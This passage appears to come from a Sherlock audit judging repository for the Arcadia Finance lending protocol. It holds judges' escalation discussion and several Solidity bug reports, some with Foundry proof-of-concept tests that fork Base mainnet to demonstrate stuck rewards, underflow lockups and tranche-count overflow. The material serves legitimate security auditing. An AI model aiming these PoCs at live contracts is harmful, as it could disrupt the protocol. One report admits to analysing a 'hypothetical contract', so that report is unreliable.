  2. If an attacker wants to make significant profits with this, they have to put a lot of funds in the Tranche (order of total liquidity in the Tranche). This also can't be done atomic or via flash loans, so it have to actual attacker funds locked in Tranche. Even if it happens the dilution is a share of a single badDebt amount shared over all LPs.
  3. The attacker can not trigger or be sure donateToTranche() is ever triggered. The recipient of the Account is a permissioned role, and not forced to use donateToTranche() in this specific flow.

@Czar102 Is there an expectation of a donation of nonzero proceeds in the unhappy flow? Or are positive proceeds not expected?

Not sure I fully understand the question, auctionBoughtIn is only called if an auction failed, that can be due to market conditions (-> no profit) or due to technical problems (reverting getValue or sometghing like that), in the latter case it can be that the proceeds of the manually liquidated Account were bigger than the initial debt.

@Atharv181, It is clearly mentioned here that it is used to compensate the tranche after an auction didn't get sold (unhappy flow)

We say very clear: It is A way. We do not say it is the way. It is not enforced by the logic of the protocol!

Czar102

The situation of unhappy flow hasn't been taken out of scope (despite it being perceived as extremely improbable), and it has been explicitly mentioned that the donateToTranche() is to be used in scenarios where funds from the liquidation are to be returned. An action not being enforced by the smart contract logic doesn't make the intended use of a function out of scope.

Since this approach is exploitable, I'm planning to consider it a valid Medium severity issue.

Czar102

Result: Medium Has duplicates

sherlock-admin3

Escalations have been resolved successfully!

Escalation status:

Issue M-6: LendingPool#flashAction is broken when trying to refinance position across LendingPools due to improper access control

Source: #145

Found by

0x52

Summary

When refinancing an account, LendingPool#flashAction is used to facilitate the transfer. However due to access restrictions on updateActionTimestampByCreditor, the call made from the new creditor will revert, blocking any account transfers. This completely breaks refinancing across lenders which is a core functionality of the protocol.

Vulnerability Detail

LendingPool.sol#L564-L579

IAccount(account).updateActionTimestampByCreditor();

asset.safeTransfer(actionTarget, amountBorrowed);

{
    uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);
    if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();
}

We see above that account#updateActionTimestampByCreditor is called before flashActionByCreditor.

AccountV1.sol#L671

function updateActionTimestampByCreditor() external onlyCreditor updateActionTimestamp { }

When we look at this function, it can only be called by the current creditor. When refinancing a position, this function is actually called by the pending creditor since the flashaction should originate from there. This will cause the call to revert, making it impossible to refinance across lendingPools.

Impact

Refinancing is impossible

Code Snippet

LendingPool.sol#L529-L586

Tool used

Manual Review

Recommendation

Account#updateActionTimestampByCreditor() should be callable by BOTH the current and pending creditor

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

invalid

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#133.

Thomas-Smets

Fix consists out of two PR's:

IAm0x52

Fix looks good. Removes the updateActionTimestampByCreditor call and instead uses a callback to enforce nonreentrant and prevent ERC777s from reentering

sherlock-admin4

The Lead Senior Watson signed off on the fix.

2023-12-arcadia-judging's People

Contributors

sherlock-admin avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

2023-12-arcadia-judging's Issues

0xVolodya - reward tokens will be stuck in staking contract

0xVolodya

medium

reward tokens will be stuck in staking contract

Summary

Some amount of tokens will be stuck in a staking contract after users burn their positions. POC below

Vulnerability Detail

The _getRewardBalances function calculations are off. The problem arises after two consecutive mints, on the third interaction with a stakingmodule. An amount of rewards equal to the pending rewards at the second interaction are then claimed but not added to the reward balances.

    function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {
        if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);
            // Calculate and update the new RewardPerToken of the asset.
            // unchecked: RewardPerToken can overflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }
            // Update the reward balance of the asset.
            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

            // Calculate the new positionState.
            // Calculate the difference in rewardPerToken since the last position interaction.
            // unchecked: RewardPerToken can underflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                deltaRewardPerToken = assetState_.lastRewardPerTokenGlobal - positionState_.lastRewardPerTokenPosition;
            }
            // Calculate the rewards earned by the position since its last interaction.
            // unchecked: deltaRewardPerToken and positionState_.amountStaked are smaller than type(uint128).max.
            unchecked {
                deltaReward = deltaRewardPerToken * positionState_.amountStaked / 1e18;
            }
            // Update the reward balance of the position.
            positionState_.lastRewardPosition =
                SafeCastLib.safeCastTo128(positionState_.lastRewardPosition + deltaReward);
        }
        // Update the RewardPerToken of the position.
        positionState_.lastRewardPerTokenPosition = assetState_.lastRewardPerTokenGlobal;

        return (assetState_, positionState_);
    }

AbstractStakingAM.sol#L529

Impact

Code Snippet

Tool used

POC

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.22;

import "forge-std/Test.sol";
import {StakedStargateAM, IRegistry, ILpStakingTime} from "../src/asset-modules/Stargate-Finance/StakedStargateAM.sol";


contract Registry {
    function addAsset(address asset) public {
    }

    function isAllowed(address asset, uint256 assetId) public view returns (bool){
        return true;
    }
}
interface IERC20 {
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(address from, address to, uint256 value) external returns (bool);
    function withdraw(uint256 wad) external;
    function deposit(uint256 wad) external returns (bool);
    function owner() external view returns (address);
}

contract RewardsStuck is Test {
    IERC20 USDbCpool = IERC20(0x4c80E24119CFB836cdF0a6b53dc23F04F7e652CA);
    IERC20 rewardToken = IERC20(0xE3B53AF74a4BF62Ae5511055290838050bf764Df);
    ILpStakingTime LpStakingTime = ILpStakingTime(0x06Eb48763f117c7Be887296CDcdfad2E4092739C);

    StakedStargateAM stakedStargateAM;
    Registry registry;
    address user1 = 0x160B6772c9976d21ddFB3e3211989Fa099451af7;
    address user2 = 0x2db0500e1942626944efB106D6A66755802Cef20;

    function setUp() public {
        vm.createSelectFork("https://mainnet.base.org", 10_116_031);

        registry = new Registry();
    }

    function test() external {
        stakedStargateAM = new StakedStargateAM(address(registry), address(LpStakingTime));
        stakedStargateAM.addAsset(1);
        deal(address(USDbCpool), address(this), 10000);
        deal(address(USDbCpool), address(user1), 10000);
        USDbCpool.approve(address(stakedStargateAM), type(uint256).max);

        uint positionId = stakedStargateAM.mint(address(USDbCpool), 10000);
        console.log("------------------");

        vm.warp(block.timestamp + 1000);

        vm.startPrank(address(user1));
        USDbCpool.approve(address(stakedStargateAM), type(uint256).max);
        uint positionId2 = stakedStargateAM.mint(address(USDbCpool), 10000);

        vm.warp(block.timestamp + 1000);
        console.log("staked in the middle: ", stakedStargateAM.totalStaked(address(USDbCpool)));

        vm.stopPrank();
        stakedStargateAM.burn(positionId);

        vm.warp(block.timestamp + 1000);

        vm.startPrank(address(user1));
        stakedStargateAM.burn(positionId2);
        console.log("--------after buring all----------");

        console.log("rewardToken.balanceOf(address(stakedStargateAM)): ", rewardToken.balanceOf(address(stakedStargateAM)));
        console.log("rewardToken.balanceOf(address(address(this))): ", rewardToken.balanceOf(address(this)));
        console.log("rewardToken.balanceOf(address(user1)): ", rewardToken.balanceOf(address(user1)));
        console.log("stakedStargateAM.totalStaked(address(USDbCpool)) ", stakedStargateAM.totalStaked(address(USDbCpool)));
    }

    function onERC721Received(address, address, uint256, bytes memory) external returns (bytes4) {
        return this.onERC721Received.selector;
    }
}
  ------------------
  staked in the middle:  20000
  --------after buring all----------
  rewardToken.balanceOf(address(stakedStargateAM)):  48055843493
  rewardToken.balanceOf(address(address(this))):  72083765165
  rewardToken.balanceOf(address(user1)):  72083765165
  stakedStargateAM.totalStaked(address(USDbCpool))  0

Manual Review

Recommendation

Either create a function so the owner can sweep the rest of the tokens, or change formula so there will be no left tokens left, or give all the rest reward tokens to the last staker.

Duplicate of #38

jesjupyer - Reorg attack is still possible in L2s

jesjupyer

medium

Reorg attack is still possible in L2s

Summary

The contract is meant to be deployed on BASE and later on Optimism, Arbitrum, and other L2s. But the Reorg attack may make some attack vectors possible. For example, the check AccountV1::COOL_DOWN_PERIOD can be bypassed, allowing the old Owner to front-run a transferFrom.

Vulnerability Detail

The contract is meant to be deployed on BASE and later on Optimism, Arbitrum, and other L2s. But Reorg attack may make some attack-vectors possible.

For example, in AccountV1::transferOwnership, a COOL_DOWN_PERIOD of 5 mins is applied to prevents the old Owner from front-running a transferFrom.

        if (block.timestamp <= lastActionTimestamp + COOL_DOWN_PERIOD) revert AccountErrors.CoolDownPeriodNotPassed();

The initial perspective is that if the asset is transferred out right before the ownership transfer, the transaction would revert to protect the new owner.

However, since a reorg attack could last for several minutes (even 10+ mins), the COOL_DOWN_PERIOD may not be enough long to protect against such an attack.

Consider the following scenario:

  1. The old owner front-runs the transferFrom related function to move assets before the ownership is transferred.
  2. By default, this should revert. But if the reorg occurs, the transferFrom happens first, and the transferOwnership happens 5 minutes later. Then, the transaction will not revert.

Impact

Reorg attack may make some attack vectors possible. For example, the check on AccountV1::COOL_DOWN_PERIOD can be bypassed, allowing the old Owner to front-runn with a transferFrom to steal the funds of the new owner.

Code Snippet

AccountV1::transferOwnership

    function transferOwnership(address newOwner) external onlyFactory notDuringAuction {
        if (block.timestamp <= lastActionTimestamp + COOL_DOWN_PERIOD) revert AccountErrors.CoolDownPeriodNotPassed();

        // The Factory will check that the new owner is not address(0).
        owner = newOwner;
    }

Tool used

Manual Review

Recommendation

Reorg should be taken into account. For example, try making COOL_DOWN_PERIOD longer to mitigate the issue.

Anubis - Potential Reentrancy Vulnerability in createAccount Function

Anubis

high

Potential Reentrancy Vulnerability in createAccount Function

Summary

The createAccount function in the provided smart contract may be vulnerable to a reentrancy attack, potentially allowing malicious actors to manipulate account creation.

Vulnerability Detail

The createAccount function in the contract appears to interact with an external contract (via the IAccount(account).initialize(...) call) without proper reentrancy guards. If the IAccount contract is malicious or compromised, it could potentially call back into the createAccount function, leading to unexpected behavior or state manipulation.

Impact

Reentrancy attacks can have severe consequences, especially in functions that change critical state variables or transfer assets. In this case, if an attacker is able to re-enter the createAccount function, they might be able to:

Create multiple accounts with the same parameters.
Manipulate the state of the contract to their advantage, possibly affecting the integrity of the account creation process.
The impact can be exemplified as follows:

Attacker deploys a malicious IAccount contract.
Attacker calls createAccount, triggering the initialization of their malicious contract.
During initialization, the malicious contract makes a reentrant call to createAccount.
This reentrancy can lead to multiple accounts being created unintentionally or state variables being modified unexpectedly.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol#L84-L88

Tool used

Manual Review

Recommendation

To mitigate this vulnerability, consider implementing a reentrancy guard using the nonReentrant modifier from the OpenZeppelin library. This modifier ensures that the function cannot be re-entered while it's still executing. Modify the createAccount function as follows:

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract Factory is IFactory, ERC721, FactoryGuardian, ReentrancyGuard {
    // ... [omitted code] ...

    function createAccount(uint256 salt, uint256 accountVersion, address creditor)
        external
        whenCreateNotPaused
        nonReentrant // Add this line
        returns (address account)
    {
        // ... [existing function code] ...
    }

    // ... [omitted code] ...
}

This revision of the report provides a more focused analysis on a specific part of the hypothetical contract, outlining the potential vulnerability, its impact, and a concrete solution.

n1punp - Deployment on L2 will fail since most L2s are currently incompatible with solidity 0.8.20+ (no PUSH0 opcode support yet).

n1punp

medium

Deployment on L2 will fail since most L2s are currently incompatible with solidity 0.8.20+ (no PUSH0 opcode support yet).

Summary

Deployment on L2 will fail since most L2s are currently incompatible with solidity 0.8.20+ (no PUSH0 opcode support yet).

Vulnerability Detail

Most L2s currently do not support PUSH0 opcode, so solidity 0.8.20+ is still not supported. For example, see the documentaiton on Arbitrum support
https://docs.arbitrum.io/for-devs/concepts/differences-between-arbitrum-ethereum/solidity-support

Impact

Smart contracts will not be able to be deployed on most L2s.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/guardians/LendingPoolGuardian.sol#L5 (applies to all contracts)

Tool used

Manual Review

Recommendation

  • Downgrade Solidity version to 0.8.19 for the time-being, while PUSH0 gets supported (Arbitrum announced that it will plan to support soon).

popeye - `ChainlinkOM::_getLatestAnswer` may return invalid price due to zero value acceptance.

popeye

medium

ChainlinkOM::_getLatestAnswer may return invalid price due to zero value acceptance.

Summary

ChainlinkOM::_getLatestAnswer() function may return invalid price(answer) due to its acceptance of zero as a valid price. This flaw arises from the conditional check that improperly allows answer_ >= 0, including zero, which is not a valid price.

Vulnerability Detail

The ChainlinkOM::_getLatestAnswer() internal function fetches the latest price data from the Chainlink oracle contract. This data is returned in a tuple that includes the answer_ variable containing the latest price:

    function _getLatestAnswer(OracleInformation memory oracleInformation_)
        internal
        view
        returns (bool success, uint256 answer)
    {
        try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
            uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
        ) {
            if (
@>              roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime
                    && updatedAt <= block.timestamp
            ) {
                success = true;
                answer = uint256(answer_);
            }
        } catch { }
    }

This answer_ price is validated with the following check:

answer_ >= 0

This allows a price of 0 to be considered a valid price. However, 0 is likely an incorrect price and should be considered invalid.

Impact

It allows zero price validation in ChainlinkOM::_getLatestAnswer() , risking systemic inaccuracies in asset pricing.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L94
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L121-L124
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L144

Tool used

Manual Review

Recommendation

Update the ChainlinkOM::_getLatestAnswer() function to ensure that answer_ must be strictly greater than zero.

function _getLatestAnswer(OracleInformation memory oracleInformation_) 
	internal 
	view 
	returns (bool success, uint256 answer)
{
	try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
		uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
	) {
		if (
--		roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime && updatedAt <= block.timestamp
++ 		roundId > 0 && answer_ > 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime && updatedAt <= block.timestamp
		) {
			success = true;
			answer = uint256(answer_);
		}
	} catch { }
}

Duplicate of #126

0xrice.cooker - Rounding up when bidding without protection lead to bidder have to spend more to buy borrower's collateral than expected

0xrice.cooker

medium

Rounding up when bidding without protection lead to bidder have to spend more to buy borrower's collateral than expected

Summary

Rounding up when bidding without protection lead to bidder have to spend more to buy borrower's collateral than expected

Vulnerability Detail

There's 2 rounding issue need to solve in Liquidator contract.
First of all, total share of any liquidation can be bigger than 10000 and up to 10015

    function _getAssetShares(AssetValueAndRiskFactors[] memory assetValues)
        internal
        pure
        returns (uint32[] memory assetShares)
    {
        uint256 length = assetValues.length;
        uint256 totalValue;
        for (uint256 i; i < length; ++i) {
            unchecked {
                totalValue += assetValues[i].assetValue;
            }
        }
        assetShares = new uint32[](length);
        
        if (totalValue == 0) return assetShares;
        
        for (uint256 i; i < length; ++i) {
            assetShares[i] = uint32(assetValues[i].assetValue.mulDivUp(ONE_4, totalValue));//<@@ all rounding up -> total asset share will bigger than 10000
        }
    }

Secondly, rounding assetShares of any collateral will always be lower than 10000, rounding up here can make bidder have to spend more money for bidding

    function _calculateTotalShare(AuctionInformation storage auctionInformation_, uint256[] memory askedAssetAmounts)
        internal
        view
        returns (uint256 totalShare)
    {
        uint256[] memory assetAmounts = auctionInformation_.assetAmounts;
        uint32[] memory assetShares = auctionInformation_.assetShares;
        if (assetAmounts.length != askedAssetAmounts.length) {
            revert LiquidatorErrors.InvalidBid();
        }

        for (uint256 i; i < askedAssetAmounts.length; ++i) {
            unchecked {
                totalShare += askedAssetAmounts[i].mulDivUp(assetShares[i], assetAmounts[i]);//<@@ because the assetShares[i] < 10000 -> lead to to rounding issue
            }
        }
    }

Let have a scenario:
- Let say there's borrower who get liquidated and have collaterals worth 100k
- Let say there's one asset in the bundle that is 1e18 amount with value is 1001$ -> 101 share
- Bidder want to buy 0.1e18 amount of that asset which is only 10.1 share, but in reality user must pay 11 share because of round up system
- Let say the bid price of that asset still 1001$/1e18 token. Bidder must pay 110.11$ for 0.1e18 that valued 100.1$ -> losing 10.01$

Note that borrower can have up to 15 type of collateral. If bidder scatter askAssetAmounts across multiple asset, losing cost because of rounding can be massive

Moreover, the total share of a action will not be likely be 10000. It will be in the range [10000, 10015], depend on the amount of asset type in the account. The reason is that due to volatile of the value of the asset, there's super low chance that assetValues[i].assetValue * ONE_4 % totalValue == 0, hence rounding up will happen and the total share will surpass 10000

Impact

Impact 1: Bidder have no protection about the outcome of the result, hence is vurnable to losing when bidding.
Impact 2: Bidder on average will have to pay [0.01% - 0.15%] more. As the consequence, bidder will need to wait longer to have a desirable price to buy than expected

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Liquidator.sol#L33

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Liquidator.sol#L266

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/Liquidator.sol#L340

Tool used

Manual Review

Recommendation

Some potential fix:

  • Change ONE_4 const in Liquidator contract from 1e4 to 1e18 to avoid rounding up
  • Have an input to check maxAssetWillPay in Liquidator.bid()
  • Make bidder buy in askedAssetShares instead of askedAssetAmounts

0xrice.cooker - Wrong intergation with Stargate's LPStakingTime contract leads to all users earn less interest than expected and rewards got stuck in StakedStargateAM contract

0xrice.cooker

high

Wrong intergation with Stargate's LPStakingTime contract leads to all users earn less interest than expected and rewards got stuck in StakedStargateAM contract

Summary

Wrong intergation with Stargate's LPStakingTime contract leads to all users earn less interest than expected and rewards got stuck in StakedStargateAM contract

Vulnerability Detail

Stagate's LPStakingTime have no method to specialise to only withdrawing reward out. Due to that, LPStakingTime.deposit() and LPStakingTime.withdraw() beside depositing/withdraw funds, it will also send the accumulated reward to the caller.

In StakedStargateAM, we don't have any logic to store the value of received reward during a call deposit() and withdraw(), hence the protocol is not even know that the reward is already distribute

Impact

This will lead to user who owns StakedStargateAM NFT will lose majority of reward. And the StakedStargateAM contract have the no method to take the un distribute reward out

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L82C1-L97C6

https://basescan.org/address/0x06Eb48763f117c7Be887296CDcdfad2E4092739C#code#F1#L159

https://basescan.org/address/0x06Eb48763f117c7Be887296CDcdfad2E4092739C#code#F1#174

Tool used

Manual Review

Recommendation

+   uint256 cache;
    
    function _stake(address asset, uint256 amount) internal override {
+	cache += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
        ERC20(asset).approve(address(LP_STAKING_TIME), amount);

        LP_STAKING_TIME.deposit(assetToPid[asset], amount);
    }

    function _withdraw(address asset, uint256 amount) internal override {
+	cache += LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
        LP_STAKING_TIME.withdraw(assetToPid[asset], amount);
    }

    function _claimReward(address asset) internal override {
+	cache = 0;
        LP_STAKING_TIME.withdraw(assetToPid[asset], 0);
    }

    function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
-       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
+       currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this)) + cache;
    }

Duplicate of #38

cawfree - It is possible to create more than `256` tranches.

cawfree

medium

It is possible to create more than 256 tranches.

Summary

The protocol invariant maximum number of associated tranches for a single lending pool (256) can be invalidated.

Vulnerability Detail

The README.md for the contest specifically highlights the invariant that:

No more than 256 tranches to a single lending pool.

However, this upper limit is not enforced.

In the snippet below, we demonstrate that an authorized owner can add more tranches than the intended protocol invariant maximum:

📄 AddTranche.fuzz.t.sol

/// @dev Demonstrate that we can add an arbitrary number of tranches.
function test_tooManyTranches() public {

    /// @dev Here, we iterate past the invariant `256` tranches. This can continue indefinitely.
    for (uint256 i; i < 256 + 1; ++i) {

      address trancheAddress = address(uint160(i + 0x6969));

      vm.prank(users.creatorAddress);
        pool_.addTranche(trancheAddress, 10 /* interestWeight */);

    }
}

This issue likely arises from the fact that a uint8 is used to uniquely identify lending pool tranches, the assumption being that this value cannot normally overflow outside of an unchecked block.

However, we type cast the array length directly to a uint8 directly, resulting in truncation of the identifier, leading in the insertion of tranches past the intended maximum:

/**
 * @notice Adds a tranche to the Lending Pool.
 * @param tranche The address of the Tranche.
 * @param interestWeight_ The interest weight of the specific Tranche.
 * @dev The order of the tranches is important, the most senior tranche is added first at index 0, the most junior at the last index.
 * @dev Each Tranche is an ERC4626 contract.
 * @dev The interest weight of each Tranche determines the relative share of the yield (interest payments) that goes to its Liquidity providers.
 */
function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
    if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
    if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

    totalInterestWeight += interestWeight_;
    interestWeightTranches.push(interestWeight_);
    interestWeight[tranche] = interestWeight_;

@>  uint8 trancheIndex = uint8(tranches.length); /// @audit integer_overflow
    tranches.push(tranche);
    isTranche[tranche] = true;

    emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
}

This permits both arbitrary numbers of tranches to be associated with a single LendingPool, defeating the protocol invariant and introducing a number of highly undesirable second-order effects to pool operation due to identifier collision.

Impact

Medium - we demonstrate that we have undermined an explicitly-documented protocol invariant, however unlikely this would be to happen in production.

Code Snippet

/**
 * @notice Adds a tranche to the Lending Pool.
 * @param tranche The address of the Tranche.
 * @param interestWeight_ The interest weight of the specific Tranche.
 * @dev The order of the tranches is important, the most senior tranche is added first at index 0, the most junior at the last index.
 * @dev Each Tranche is an ERC4626 contract.
 * @dev The interest weight of each Tranche determines the relative share of the yield (interest payments) that goes to its Liquidity providers.
 */
function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
    if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
    if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

    totalInterestWeight += interestWeight_;
    interestWeightTranches.push(interestWeight_);
    interestWeight[tranche] = interestWeight_;

    uint8 trancheIndex = uint8(tranches.length);
    tranches.push(tranche);
    isTranche[tranche] = true;

    emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
}

Tool used

Foundry

Recommendation

Use SafeCastLib.safeCastTo8(uint8) to implicitly throw for excessive numbers of tranches.

📄 LendingPool.sol

- uint8 trancheIndex = uint8(tranches.length);
+ uint8 trancheIndex = SafeCastLib.safeCastTo8(tranches.length);
tranches.push(tranche);
isTranche[tranche] = true;

Duplicate of #32

mstpr-brainbot - Staked stargate asset module STG reward tracking can underflow blocking all interactions

mstpr-brainbot

high

Staked stargate asset module STG reward tracking can underflow blocking all interactions

Summary

When users deposit to the staked Stargate AM the reward tracking can underflow hence, all interactions to be made in staked Stargate am will revert

Vulnerability Detail

When users deposit to the Staked Stargate Asset Module, the module updates its reward tracking internally as seen here:
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L529-L569

The problem is the underflow happening in these lines:

if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
            // Calculate the increase in rewards since last Asset interaction. // @review UNDERFLOW!
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);

When a deposit occurs in the Stargate masterchef contract, the rewards are automatically claimed, resulting in a claimable balance of "0" whenever someone mints a new token.

The getCurrentReward function provides the latest claimable rewards since the asset module interacted with the Stargate masterchef. This value is not necessarily greater than the assetState.lastRewardGlobal value.

Textual Proof of Concept (PoC):
Alice mints a token at t=0, assuming 1 STG reward accrues to the staked Stargate AM every second.

At t=10, Bob joins and mints a staked Stargate AM NFT like Alice. When the deposit happens, the 10 STG rewards will be claimed from the Stargate masterchef contract, setting lastRewardGlobal to 10.

At t=12, Carol attempts to join and mint a staked Stargate AM. However, since the current reward global is "2" (time passed since the last interaction) and lastRewardGlobal is 10, these lines will underflow, causing the transaction to revert:
uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;

All functions of the staked Stargate AM will revert until t=20, where there will be 10 STG again, and the operation will not underflow.

Coded PoC:

// forge test --fork-url https://mainnet.base.org --match-contract StargateAM_USDbC_Fork_Test --match-test test_StgRewardTracking_Underflows -vv 
    function test_StgRewardTracking_Underflows() public {
        uint amount = 10 * 1e6;

        // Deposit 10 tokens
        uint256 lpBalance = stakeInAssetModuleAndDepositInAccount(users.accountOwner, address(proxyAccount), USDbC, amount, pid, pool);

        // Check the deposit went thru
        (bool allowed, uint128 lastRewardPerTokenGlobal, uint128 lastRewardGlobal, uint128 totalStaked) = stakedStargateAM.assetState(address(pool));
        (address _asset, uint128 _amountStaked, uint128 _lastRewardPerTokenPosition, uint128 _lastRewardPosition) = stakedStargateAM.positionState(1);
        assertEq(totalStaked, lpBalance);
        assertEq(_amountStaked, lpBalance);
        
        // Accrue some STG tokens
        skip(10 days);

        // deposit an another 10 tokens, this will claim the pending STG
        lpBalance = stakeInAssetModuleAndDepositInAccount(users.accountOwner, address(proxyAccount), USDbC, amount, pid, pool);

        // skip 1 more day, since 10 days STG yield is more than 1 day STG yield this will underflow!
        skip(1 days);
        lpBalance = stakeInAssetModuleAndDepositInAccount(users.accountOwner, address(proxyAccount), USDbC, amount, pid, pool);
    }

Impact

All staked Stargate AM interactions will be reverting due to underflow.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L529-L569

Tool used

Manual Review

Recommendation

Duplicate of #38

dany.armstrong90 - Donation may be added to zero address.

dany.armstrong90

medium

Donation may be added to zero address.

Summary

LendingPool.sol#donateToTranche function does not check if trancheIndex is valid.
So the donation assets may be added to zero address but not to the intended tranche.

Vulnerability Detail

LendingPool.sol#donateToTranche function is the following.

    function donateToTranche(uint256 trancheIndex, uint256 assets) external whenDepositNotPaused processInterests {
        if (assets == 0) revert LendingPoolErrors.ZeroAmount();

353:    address tranche = tranches[trancheIndex];

        // Need to transfer before donating or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(msg.sender, address(this), assets);

        unchecked {
360:        realisedLiquidityOf[tranche] += assets; //[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]
            totalRealisedLiquidity = SafeCastLib.safeCastTo128(assets + totalRealisedLiquidity);
        }
    }

As can be seen, the above function does not check if trancheIndex is valid.
If trancheIndex >= tranches.length, the tranche = address(0) holds in L353.
So the donated assets may be added to zero address but not to the intended tranche in L360.

Example:

  1. Administrator tries to donate assets to the junior tranche by calling donateToTranche function.
  2. While the admin's tx stays in the mempool, the junior tranche is popped by unhappy liquidation flow.
  3. The donation assets are added to zero address.

Impact

Donation process may function with error and the donation assets will not be added to intended tranches.
There is no way of withdrawing these assets from the contract.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L353

Tool used

Manual Review

Recommendation

Modify the LendingPool.sol#donateToTranche function as follows.

    function donateToTranche(uint256 trancheIndex, uint256 assets) external whenDepositNotPaused processInterests {
        if (assets == 0) revert LendingPoolErrors.ZeroAmount();
++      if (trancheIndex >= tranches.length) revert LendingPoolErrors.NonExistingTranche();

        address tranche = tranches[trancheIndex];

        // Need to transfer before donating or ERC777s could reenter.
        // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
        asset.safeTransferFrom(msg.sender, address(this), assets);

        unchecked {
            realisedLiquidityOf[tranche] += assets; //[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]
            totalRealisedLiquidity = SafeCastLib.safeCastTo128(assets + totalRealisedLiquidity);
        }
    }

Duplicate of #199

dany.armstrong90 - Administrator cannot get liquidity of treasury correctly.

dany.armstrong90

medium

Administrator cannot get liquidity of treasury correctly.

Summary

Administrator can get liquidity of treasury by calling LendingPool.sol#liquidityOf function.
In the case of lastSyncedTimestamp != block.timestamp, the return value does not contain the unrealised interest.

Vulnerability Detail

LendingPool.sol#liquidityOf function is the following.

    function liquidityOf(address owner_) external view returns (uint256 assets) {
        // Avoid a second calculation of unrealised debt (expensive).
        // if interests are already synced this block.
643:    if (lastSyncedTimestamp != uint32(block.timestamp)) {
            // The total liquidity of a tranche equals the sum of the realised liquidity
            // of the tranche, and its pending interests.
